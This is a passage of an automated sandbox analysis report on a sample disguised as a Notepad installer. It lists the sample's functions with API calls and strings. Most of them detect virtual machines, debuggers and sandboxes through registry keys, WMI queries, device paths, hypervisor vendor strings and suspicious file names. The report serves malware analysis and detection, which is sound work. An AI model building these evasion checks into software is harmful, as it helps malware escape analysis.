                                        • Part of subcall function 006E9296: SysAllocString.OLEAUT32(?), ref: 006E92E1
                                        • Part of subcall function 006E9296: SysFreeString.OLEAUT32(?), ref: 006E930E
                                        • Part of subcall function 006E9354: SysAllocString.OLEAUT32(WQL), ref: 006E9365
                                        • Part of subcall function 006E9354: SysAllocString.OLEAUT32(?), ref: 006E936C
                                        • Part of subcall function 006E9354: SysFreeString.OLEAUT32(00000000), ref: 006E93B5
                                        • Part of subcall function 006E9354: SysFreeString.OLEAUT32(00000000), ref: 006E93C0
                                      • StrCmpIW.SHLWAPI(?,System), ref: 006EBEA3
                                      • VariantClear.OLEAUT32(?), ref: 006EBEB5
                                      • SafeArrayAccessData.OLEAUT32(?,?), ref: 006EBED8
                                      • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 006EBEE8
                                      • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 006EBEF4
                                      • SafeArrayGetElement.OLEAUT32(?,?,?), ref: 006EBF11
                                      • lstrcmpiW.KERNEL32(?,006F60C8), ref: 006EBF22
                                      • SafeArrayUnaccessData.OLEAUT32(?), ref: 006EBF4E
                                      • VariantClear.OLEAUT32(?), ref: 006EBF58
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.271913342.00000000006E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_6e0000_Notteppad_SettupX32iX64.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: String$ArraySafe$AllocFree$BoundClearDataVariant$AccessElementUnaccesslstrcmpi
                                      • String ID: FileName$ROOT\CIMV2$SELECT * FROM Win32_NTEventlogFile$Sources$System$VBoxVideoW8$VBoxWddm$vboxvideo
                                      • API String ID: 2291613145-3433602254
                                      • Opcode ID: 45b90dea2fa61396d87527b7beb2599efedf9394fda19c29c0a82a2d053a57c8
                                      • Instruction ID: 3bb9a06011ce615f86fafd5ab0d33555f6f4bee33e6a083dd9c0084fda87ffc4
                                      • Opcode Fuzzy Hash: 45b90dea2fa61396d87527b7beb2599efedf9394fda19c29c0a82a2d053a57c8
                                      • Instruction Fuzzy Hash: 5E51F871D01249AFCB10DFA6CD489EFBBBEEF88700B105555F516E6250DB70AA46CF60
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 006EB17A Relevance: 29.9, APIs: 8, Strings: 9, Instructions: 110registryCOMMON
                                      Download Yara Rule
                                      APIs
                                      • RegOpenKeyExW.ADVAPI32(80000002,006F5418,00000000,00020019,?), ref: 006EB1EA
                                      • RegQueryInfoKeyW.ADVAPI32(?,00000000,00000000,00000000,?,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 006EB20C
                                      • malloc.MSVCRT ref: 006EB21E
                                      • RegCloseKey.ADVAPI32(?), ref: 006EB22E
                                      • RegEnumKeyExW.ADVAPI32(?,00000000,00000000,?,00000000,00000000,00000000,00000000), ref: 006EB250
                                      • StrStrIW.SHLWAPI(00000000,006F51A0), ref: 006EB266
                                      • ??3@YAXPAX@Z.MSVCRT ref: 006EB295
                                      • RegCloseKey.ADVAPI32(?), ref: 006EB29F
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.271913342.00000000006E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_6e0000_Notteppad_SettupX32iX64.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Close$??3@EnumInfoOpenQuerymalloc
                                      • String ID: System\CurrentControlSet\Enum\IDE$System\CurrentControlSet\Enum\SCSI$VMW$Virtual$qemu$vbox$virtio$vmware$xen
                                      • API String ID: 266897880-373962024
                                      • Opcode ID: b37b1a70f3bae7ef0b8bf4ff2261ebd74a2b0b614550e987dc66add71be42582
                                      • Instruction ID: 30eeac86aa78fc0858977e83253a38ceb6d294bf5e8bda73ccbec84d8415b3cc
                                      • Opcode Fuzzy Hash: b37b1a70f3bae7ef0b8bf4ff2261ebd74a2b0b614550e987dc66add71be42582
                                      • Instruction Fuzzy Hash: B441E571D02229EFDB118F96D8489FFBFBAFF05755B10505AE616A6210D3B04A44CFA0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 006EA0E7 Relevance: 26.4, APIs: 13, Strings: 2, Instructions: 138memorythreadCOMMON
                                      Download Yara Rule
                                      APIs
                                      • VirtualAlloc.KERNEL32(00000000,00004000,00003000,00000004), ref: 006EA107
                                      • VirtualAlloc.KERNEL32(00000000,01000000,00203000,00000004), ref: 006EA11E
                                      • VirtualFree.KERNEL32(?,00000000,00008000), ref: 006EA134
                                      • GlobalGetAtomNameW.KERNEL32(00000000,00000000,00000001), ref: 006EA145
                                      • GetEnvironmentVariableW.KERNEL32(%ThisIsAnInvalidEnvironmentVariableName?[]<>@\;*!-{}#:/~%,00000000,01000000), ref: 006EA15F
                                      • GetBinaryTypeW.KERNEL32(%ThisIsAnInvalidFileName?[]<>@\;*!-{}#:/~%,00000000), ref: 006EA174
                                      • HeapQueryInformation.KERNEL32(00000000,00000045,00001000,00001000,00000000), ref: 006EA191
                                      • ReadProcessMemory.KERNEL32(000000FF,69696969,00001000,00001000,00000000), ref: 006EA1AD
                                      • GetThreadContext.KERNEL32(000000FF,?), ref: 006EA1C2
                                      • GetWriteWatch.KERNEL32(00000000,006EA0E7,00000000,00000000,00000000,?), ref: 006EA1DE
                                      • GetWriteWatch.KERNEL32(00000000,00001000,00001000,?,?,?), ref: 006EA209
                                      • VirtualFree.KERNEL32(?,00000000,00008000), ref: 006EA233
                                      • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 006EA23B
                                      Strings
                                      • %ThisIsAnInvalidFileName?[]<>@\;*!-{}#:/~%, xrefs: 006EA16F
                                      • %ThisIsAnInvalidEnvironmentVariableName?[]<>@\;*!-{}#:/~%, xrefs: 006EA15A
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.271913342.00000000006E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_6e0000_Notteppad_SettupX32iX64.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Virtual$Free$AllocWatchWrite$AtomBinaryContextEnvironmentGlobalHeapInformationMemoryNameProcessQueryReadThreadTypeVariable
                                      • String ID: %ThisIsAnInvalidEnvironmentVariableName?[]<>@\;*!-{}#:/~%$%ThisIsAnInvalidFileName?[]<>@\;*!-{}#:/~%
                                      • API String ID: 856979550-3886066446
                                      • Opcode ID: 4cea89b9dd1df28ac1a49e07dad39235c81d16f7b38315f1492f75423d5e144b
                                      • Instruction ID: ddf6a37709b84f5541b7028307f5fba2d67e3ffc6aa92d2c32bb17d430b3af6d
                                      • Opcode Fuzzy Hash: 4cea89b9dd1df28ac1a49e07dad39235c81d16f7b38315f1492f75423d5e144b
                                      • Instruction Fuzzy Hash: 6841F8313403567FE7209FA29C49FBBBB6EEB81F94F150518B700E11D0DA62A844DB62
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 006E6977 Relevance: 24.7, APIs: 13, Strings: 1, Instructions: 180memorynativeCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 006E68D5: memset.NTDLL ref: 006E6902
                                        • Part of subcall function 006E68D5: VerSetConditionMask.NTDLL(00000000,00000000,00000002,00000002), ref: 006E6930
                                        • Part of subcall function 006E68D5: VerifyVersionInfoW.KERNEL32(00000000,00000002,00000000), ref: 006E6949
                                      • GetCurrentProcess.KERNEL32(00000018,006F2FB8,00000004,?,00000000,?,00000000), ref: 006E69C1
                                      • NtQueryInformationProcess.NTDLL(00000000), ref: 006E69C8
                                      • SysAllocString.OLEAUT32(006E34CD), ref: 006E6A40
                                      • SysAllocString.OLEAUT32(?), ref: 006E6A47
                                      • SysAllocString.OLEAUT32(?), ref: 006E6A4F
                                      • SysAllocString.OLEAUT32(open), ref: 006E6A59
                                      • VariantInit.OLEAUT32(?), ref: 006E6A92
                                      • VariantInit.OLEAUT32(?), ref: 006E6A98
                                      • VariantInit.OLEAUT32(?), ref: 006E6A9E
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.271913342.00000000006E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_6e0000_Notteppad_SettupX32iX64.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: AllocString$InitVariant$Process$ConditionCurrentInfoInformationMaskQueryVerifyVersionmemset
                                      • String ID: open
                                      • API String ID: 2277313411-2758837156
                                      • Opcode ID: fe0cb6f602093a9447ebb4897d5a421bd5693e4dc9115a146d7a2e81c775470b
                                      • Instruction ID: 2d19a01bde90864b866061693f3848648f5a0e732ed45eeeaf6da69da96d72bd
                                      • Opcode Fuzzy Hash: fe0cb6f602093a9447ebb4897d5a421bd5693e4dc9115a146d7a2e81c775470b
                                      • Instruction Fuzzy Hash: C5512772D11668EBDF11EFA9DC859AEBBBABF08350F14012AF900E7250EB715845CB90
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 006EA46B Relevance: 24.6, APIs: 6, Strings: 8, Instructions: 61stringCOMMON
                                      Download Yara Rule
                                      APIs
                                      • PathFindFileNameW.SHLWAPI(00780065), ref: 006EA4C2
                                      • lstrcmpiW.KERNEL32(006F4DA0,00000000), ref: 006EA4D4
                                      • PathRemoveExtensionW.SHLWAPI(00000000), ref: 006EA4E6
                                      • lstrlenW.KERNEL32(00000000), ref: 006EA4F3
                                      • lstrlenW.KERNEL32(00000000), ref: 006EA4FB
                                      • lstrlenW.KERNEL32(00000000), ref: 006EA503
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.271913342.00000000006E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_6e0000_Notteppad_SettupX32iX64.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrlen$Path$ExtensionFileFindNameRemovelstrcmpi
                                      • String ID: bot.exe$klavme.exe$malware.exe$myapp.exe$sample.exe$sandbox.exe$test.exe$testapp.exe
                                      • API String ID: 3403677523-863941656
                                      • Opcode ID: db7f45093fe1e602e7be7fac52e71062e4e67e547b79ce966f621195ffd7abfb
                                      • Instruction ID: 6e035bccde762ce64722e28bc66d170778525bfd3ffb0873ecf9393e427e58c8
                                      • Opcode Fuzzy Hash: db7f45093fe1e602e7be7fac52e71062e4e67e547b79ce966f621195ffd7abfb
                                      • Instruction Fuzzy Hash: B511C1719023499BCB11DFA6DC889BFBFFABF49705B100418E601E7610DB749A45CFA1
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00402E30 Relevance: 23.0, APIs: 15, Instructions: 474COMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.271740599.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.271723163.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.271783698.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.271790744.000000000040C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.271814853.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.271824359.0000000000425000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.271831250.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.271839623.000000000042B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_Notteppad_SettupX32iX64.jbxd
                                      Similarity
                                      • API ID: _open_readcallocmallocmemcpy
                                      • String ID:
                                      • API String ID: 3792786917-0
                                      • Opcode ID: e3ce8cbc618d705375c52b41698766bb3485c21fd7e5cc8ca773cbdfeb64646a
                                      • Instruction ID: 5257884f3d9e0f8c53abc5f2577ab6bd16892c8337c5b55fc42040c9d18c7db4
                                      • Opcode Fuzzy Hash: e3ce8cbc618d705375c52b41698766bb3485c21fd7e5cc8ca773cbdfeb64646a
                                      • Instruction Fuzzy Hash: A2125B716083418FC710DF28C58472FBBE1BF88704F19896EE894AB391D778E945CB9A
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 006EB987 Relevance: 22.9, APIs: 6, Strings: 7, Instructions: 160COMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 006E9296: SysAllocString.OLEAUT32(?), ref: 006E92E1
                                        • Part of subcall function 006E9296: SysFreeString.OLEAUT32(?), ref: 006E930E
                                        • Part of subcall function 006E9354: SysAllocString.OLEAUT32(WQL), ref: 006E9365
                                        • Part of subcall function 006E9354: SysAllocString.OLEAUT32(?), ref: 006E936C
                                        • Part of subcall function 006E9354: SysFreeString.OLEAUT32(00000000), ref: 006E93B5
                                        • Part of subcall function 006E9354: SysFreeString.OLEAUT32(00000000), ref: 006E93C0
                                      • StrStrW.SHLWAPI(?,VBOX), ref: 006EBA40
                                      • VariantClear.OLEAUT32(?), ref: 006EBA4D
                                      • StrStrW.SHLWAPI(?,VBOX), ref: 006EBA83
                                      • VariantClear.OLEAUT32(?), ref: 006EBA90
                                      • StrStrW.SHLWAPI(?,VEN_VBOX), ref: 006EBAC6
                                      • VariantClear.OLEAUT32(?), ref: 006EBAD3
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.271913342.00000000006E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_6e0000_Notteppad_SettupX32iX64.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: String$AllocClearFreeVariant
                                      • String ID: Caption$Name$PNPDeviceID$ROOT\CIMV2$SELECT * FROM Win32_PnPDevice$VBOX$VEN_VBOX
                                      • API String ID: 1665868789-759396408
                                      • Opcode ID: 0879bc8f5cae9ec2501d3cb0ec0c559a789172c773b0c53897e14140110eccf0
                                      • Instruction ID: a6f6f41a313ec406983ce9678050e1b364dfb11aa517f95c77f2dc089e5d29d6
                                      • Opcode Fuzzy Hash: 0879bc8f5cae9ec2501d3cb0ec0c559a789172c773b0c53897e14140110eccf0
                                      • Instruction Fuzzy Hash: B0512776901259AB8F10DBDACC84DEFBBBEEF48710B145469F602EB250DB709E41CB60
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 006EAF27 Relevance: 22.9, APIs: 6, Strings: 7, Instructions: 120COMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 006E9296: SysAllocString.OLEAUT32(?), ref: 006E92E1
                                        • Part of subcall function 006E9296: SysFreeString.OLEAUT32(?), ref: 006E930E
                                        • Part of subcall function 006E9354: SysAllocString.OLEAUT32(WQL), ref: 006E9365
                                        • Part of subcall function 006E9354: SysAllocString.OLEAUT32(?), ref: 006E936C
                                        • Part of subcall function 006E9354: SysFreeString.OLEAUT32(00000000), ref: 006E93B5
                                        • Part of subcall function 006E9354: SysFreeString.OLEAUT32(00000000), ref: 006E93C0
                                      • StrStrIW.SHLWAPI(?,VMWare), ref: 006EAFDF
                                      • StrStrIW.SHLWAPI(?,Xen), ref: 006EAFED
                                      • StrStrIW.SHLWAPI(?,innotek GmbH), ref: 006EAFFB
                                      • StrStrIW.SHLWAPI(?,QEMU), ref: 006EB009
                                      • VariantClear.OLEAUT32(00000008), ref: 006EB013
                                      • VariantClear.OLEAUT32(00000008), ref: 006EB02D
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.271913342.00000000006E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_6e0000_Notteppad_SettupX32iX64.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: String$AllocFree$ClearVariant
                                      • String ID: Manufacturer$QEMU$ROOT\CIMV2$SELECT * FROM Win32_ComputerSystem$VMWare$Xen$innotek GmbH
                                      • API String ID: 261499160-1768686787
                                      • Opcode ID: 763275c2bcad26ac6ac7a2b3227200443c090e0ae43350e063f3054b4bb5a7a3
                                      • Instruction ID: 5dd77d7653407450481b6cba4290455a27a6c1fe686cb902cd7234d5821340b3
                                      • Opcode Fuzzy Hash: 763275c2bcad26ac6ac7a2b3227200443c090e0ae43350e063f3054b4bb5a7a3
                                      • Instruction Fuzzy Hash: 4C410871901219EFCB10DB99CC84DEFBBBAEF08704B140065E615E7251DB71AE45CBA0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 006E3F5F Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 73nativestringCOMMON
                                      Download Yara Rule
                                      APIs
                                      • NtQuerySystemInformation.NTDLL(00000005,00000000,00000000,006E34BF), ref: 006E3F7E
                                      • malloc.MSVCRT ref: 006E3F83
                                      • NtQuerySystemInformation.NTDLL(00000005,00000000,006E34BF,?), ref: 006E3F9D
                                      • GetCurrentProcess.KERNEL32(?,?,?,006E34BF), ref: 006E3FA9
                                        • Part of subcall function 006E4016: NtQueryInformationProcess.NTDLL(?,00000018,?,00000004,006E3FB1), ref: 006E4029
                                      • lstrcmpiW.KERNEL32(?,explorer.exe,?,?,?,006E34BF), ref: 006E3FBF
                                      • OpenProcess.KERNEL32(00000400,00000000,?,?,?,?,006E34BF), ref: 006E3FD2
                                      • GetCurrentProcess.KERNEL32(?,?,?,006E34BF), ref: 006E3FDE
                                      • CloseHandle.KERNEL32(00000000,?,?,?,006E34BF), ref: 006E3FF4
                                      • ??3@YAXPAX@Z.MSVCRT ref: 006E4007
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.271913342.00000000006E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_6e0000_Notteppad_SettupX32iX64.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Process$InformationQuery$CurrentSystem$??3@CloseHandleOpenlstrcmpimalloc
                                      • String ID: explorer.exe
                                      • API String ID: 4001965484-3187896405
                                      • Opcode ID: 05a10ee9c1670984d2f9577ce466e00341f2655323bbef4fff70eed9feef274b
                                      • Instruction ID: 9a336e3bfe9785edeb386503439f8d40b4e6204977d6b5085b8f96c3d6b3a815
                                      • Opcode Fuzzy Hash: 05a10ee9c1670984d2f9577ce466e00341f2655323bbef4fff70eed9feef274b
                                      • Instruction Fuzzy Hash: AD11607190035AAFDB109FA6DC449AEBBBAEF44759F110469FA01E3250EB718E00DF60
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 006E9AB8 Relevance: 16.6, APIs: 11, Instructions: 101threadnativeCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetCurrentThread.KERNEL32 ref: 006E9AF3
                                      • NtSetInformationThread.NTDLL(00000000), ref: 006E9AF6
                                      • NtSetInformationThread.NTDLL(0000FFFF,00000011,00000000,00000000), ref: 006E9B0C
                                      • GetCurrentThread.KERNEL32 ref: 006E9B1D
                                      • NtSetInformationThread.NTDLL(00000000), ref: 006E9B20
                                      • GetCurrentThread.KERNEL32 ref: 006E9B37
                                      • NtQueryInformationThread.NTDLL(00000000), ref: 006E9B3A
                                      • GetCurrentThread.KERNEL32 ref: 006E9B5C
                                      • NtQueryInformationThread.NTDLL(00000000), ref: 006E9B5F
                                      • GetCurrentThread.KERNEL32 ref: 006E9B75
                                      • NtQueryInformationThread.NTDLL(00000000), ref: 006E9B78
                                        • Part of subcall function 006E94C5: VerSetConditionMask.NTDLL(00000000,00000000,00000002,00000003), ref: 006E952C
                                        • Part of subcall function 006E94C5: VerSetConditionMask.NTDLL(00000000), ref: 006E9530
                                        • Part of subcall function 006E94C5: VerSetConditionMask.NTDLL(00000000), ref: 006E9534
                                        • Part of subcall function 006E94C5: VerifyVersionInfoW.KERNEL32(0000011C,00000023,00000000), ref: 006E955D
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.271913342.00000000006E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_6e0000_Notteppad_SettupX32iX64.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Thread$Information$Current$ConditionMaskQuery$InfoVerifyVersion
                                      • String ID:
                                      • API String ID: 4235557872-0
                                      • Opcode ID: 150b1c2e1514b225aebafee7c12d2fd54f476e077f165fc7b069160a198f77e4
                                      • Instruction ID: 20b07933a419e5b70e4259c5caace6418ced4033c3993b2e94227ce545b31266
                                      • Opcode Fuzzy Hash: 150b1c2e1514b225aebafee7c12d2fd54f476e077f165fc7b069160a198f77e4
                                      • Instruction Fuzzy Hash: 97216FB1A01348BAEB209FE69C89EBF7A6EDF40755F10542AF205E2140D6B49A41DA31
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 006EABFE Relevance: 15.1, APIs: 3, Strings: 7, Instructions: 55stringCOMMON
                                      Download Yara Rule
                                      APIs
                                      • memset.NTDLL ref: 006EAC5A
                                      • memcpy.NTDLL(?,006E84A4,0000000C,?,00000000,00000040,000000FF,40000000,00000000,006EA46B), ref: 006EAC69
                                      • strcmp.NTDLL ref: 006EAC7C
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.271913342.00000000006E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_6e0000_Notteppad_SettupX32iX64.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: memcpymemsetstrcmp
                                      • String ID: KVMKVMKVM$Microsoft Hv$Parallels Hv$VBoxVBoxVBox$VMwareVMware$XenVMMXenVMM$prl hyperv
                                      • API String ID: 805727082-2718720060
                                      • Opcode ID: c13e1411afb9809f6c6c20e6dfb7eafcfbe035f45bf6054e22c15d3b29e929d4
                                      • Instruction ID: 6b40f5b5841bc497d31bf23fa5d466a2a9ad25e0c0285d620a901ffb1b6b72ba
                                      • Opcode Fuzzy Hash: c13e1411afb9809f6c6c20e6dfb7eafcfbe035f45bf6054e22c15d3b29e929d4
                                      • Instruction Fuzzy Hash: 8F11C272C0170DAADB10DFEADC09AEFBFBEAB08324F104225E315B6140D37066088BA0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 006EC00E Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 89COMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.271913342.00000000006E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_6e0000_Notteppad_SettupX32iX64.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ??3@$mallocmemset
                                      • String ID: IPCA$VBOX$VirtualBox$vbox
                                      • API String ID: 1993750426-3862313162
                                      • Opcode ID: 99da7f94fa9bd4141152e904fc43d87f2d128e9eb49484ab51230e5c14ab7a48
                                      • Instruction ID: b304b861ad263c12ecfa4ab78e25a6e41ed4558bf58fc92f0c9c8cb9a940e748
                                      • Opcode Fuzzy Hash: 99da7f94fa9bd4141152e904fc43d87f2d128e9eb49484ab51230e5c14ab7a48
                                      • Instruction Fuzzy Hash: C221FB31D42395FBEF2467968C46BEF7A7BDF01330F200065F901A1381E7774A0186A5
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 006EC425 Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 49COMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 006E98DD: GetModuleHandleA.KERNEL32(kernel32.dll,?,?,006EB5D1), ref: 006E98F3
                                        • Part of subcall function 006E98DD: GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 006E98FF
                                        • Part of subcall function 006E98DD: GetCurrentProcess.KERNEL32(00000000,?,?,006EB5D1), ref: 006E9912
                                      • ExpandEnvironmentStringsW.KERNEL32(%ProgramW6432%,?,00000104,00000000,006EC4B1), ref: 006EC461
                                      • SHGetSpecialFolderPathW.SHELL32(00000000,?,00000026,00000000,00000000,006EC4B1), ref: 006EC476
                                      • PathCombineW.SHLWAPI(?,?,Pdo,do), ref: 006EC48C
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.271913342.00000000006E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_6e0000_Notteppad_SettupX32iX64.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Path$AddressCombineCurrentEnvironmentExpandFolderHandleModuleProcProcessSpecialStrings
                                      • String ID: %ProgramW6432%$Pdo,do$SPICE Guest Tools$qemu-ga
                                      • API String ID: 949058988-571663051
                                      • Opcode ID: 51acedf2a20287d029cf801bbb4251dd798a4acd375a4c98c9b931b7ce7c677d
                                      • Instruction ID: ac5bc0b0b55b4f17beba55b7d8bb5a48c000bdeb1da04f9dbe91a2dc5695ed16
                                      • Opcode Fuzzy Hash: 51acedf2a20287d029cf801bbb4251dd798a4acd375a4c98c9b931b7ce7c677d
                                      • Instruction Fuzzy Hash: 2D01757154130DAADB10EF95DC89FFA77BDEF04715F104469FB05D2080D7B09A868A61
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 006EB649 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 33fileCOMMON
                                      Download Yara Rule
                                      APIs
                                      • CreateFileW.KERNEL32(006F5D18,80000000,00000001,00000000,00000003,00000080,00000000), ref: 006EB68E
                                      • CloseHandle.KERNEL32(00000000), ref: 006EB6A6
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.271913342.00000000006E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_6e0000_Notteppad_SettupX32iX64.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CloseCreateFileHandle
                                      • String ID: \\.\VBoxGuest$\\.\VBoxMiniRdrDN$\\.\VBoxTrayIPC$\\.\pipe\VBoxMiniRdDN$\\.\pipe\VBoxTrayIPC
                                      • API String ID: 3498533004-1722504159
                                      • Opcode ID: 27bec6b001006b70028f48553288961ceba0b3825c1b64dae8addca34ab96091
                                      • Instruction ID: 4d2e99f33422a047a6d519b3bfa7dbbd361150d6acd732d0c43b28fa1cf76687
                                      • Opcode Fuzzy Hash: 27bec6b001006b70028f48553288961ceba0b3825c1b64dae8addca34ab96091
                                      • Instruction Fuzzy Hash: 39F05E71941728BAEB109FA99C19BEF7FA7AB04719F604558AB13BA1D0C3F04A448B94
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 006EB48F Relevance: 11.3, Strings: 9, Instructions: 36COMMON
                                      Download Yara Rule
                                      Strings
                                      • HARDWARE\ACPI\FADT\VBOX__, xrefs: 006EB4A3
                                      • SYSTEM\ControlSet001\Services\VBoxVideo, xrefs: 006EB4D4
                                      • SOFTWARE\Oracle\VirtualBox Guest Additions, xrefs: 006EB4B1
                                      • SYSTEM\ControlSet001\Services\VBoxMouse, xrefs: 006EB4BF
                                      • HARDWARE\ACPI\DSDT\VBOX__, xrefs: 006EB49C
                                      • HARDWARE\ACPI\RSDT\VBOX__, xrefs: 006EB4AA
                                      • SYSTEM\ControlSet001\Services\VBoxService, xrefs: 006EB4C6
                                      • SYSTEM\ControlSet001\Services\VBoxGuest, xrefs: 006EB4B8
                                      • SYSTEM\ControlSet001\Services\VBoxSF, xrefs: 006EB4CD
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.271913342.00000000006E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_6e0000_Notteppad_SettupX32iX64.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CloseOpen
                                      • String ID: HARDWARE\ACPI\DSDT\VBOX__$HARDWARE\ACPI\FADT\VBOX__$HARDWARE\ACPI\RSDT\VBOX__$SOFTWARE\Oracle\VirtualBox Guest Additions$SYSTEM\ControlSet001\Services\VBoxGuest$SYSTEM\ControlSet001\Services\VBoxMouse$SYSTEM\ControlSet001\Services\VBoxSF$SYSTEM\ControlSet001\Services\VBoxService$SYSTEM\ControlSet001\Services\VBoxVideo
                                      • API String ID: 47109696-1071494954
                                      • Opcode ID: 7e46a67079aa8a7dc73ad67b319500fd7cddd897ed6efd8221699040657c46a2
                                      • Instruction ID: 913d58b966950f6d71086bd7f2e372037218ef384c0a88e4d1e6d5b425b7d9e2
                                      • Opcode Fuzzy Hash: 7e46a67079aa8a7dc73ad67b319500fd7cddd897ed6efd8221699040657c46a2
                                      • Instruction Fuzzy Hash: 39F04F7190161DDADB009F8698494EFBFFAEB04368FA05019D76276250C3B05E488FD0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 006EA247 Relevance: 10.6, APIs: 7, Instructions: 71memoryCOMMON
                                      Download Yara Rule
                                      APIs
                                      • VirtualAlloc.KERNEL32(00000000,00004000,00003000,00000004), ref: 006EA265
                                      • VirtualAlloc.KERNEL32(00000000,01000000,00203000,00000004), ref: 006EA27B
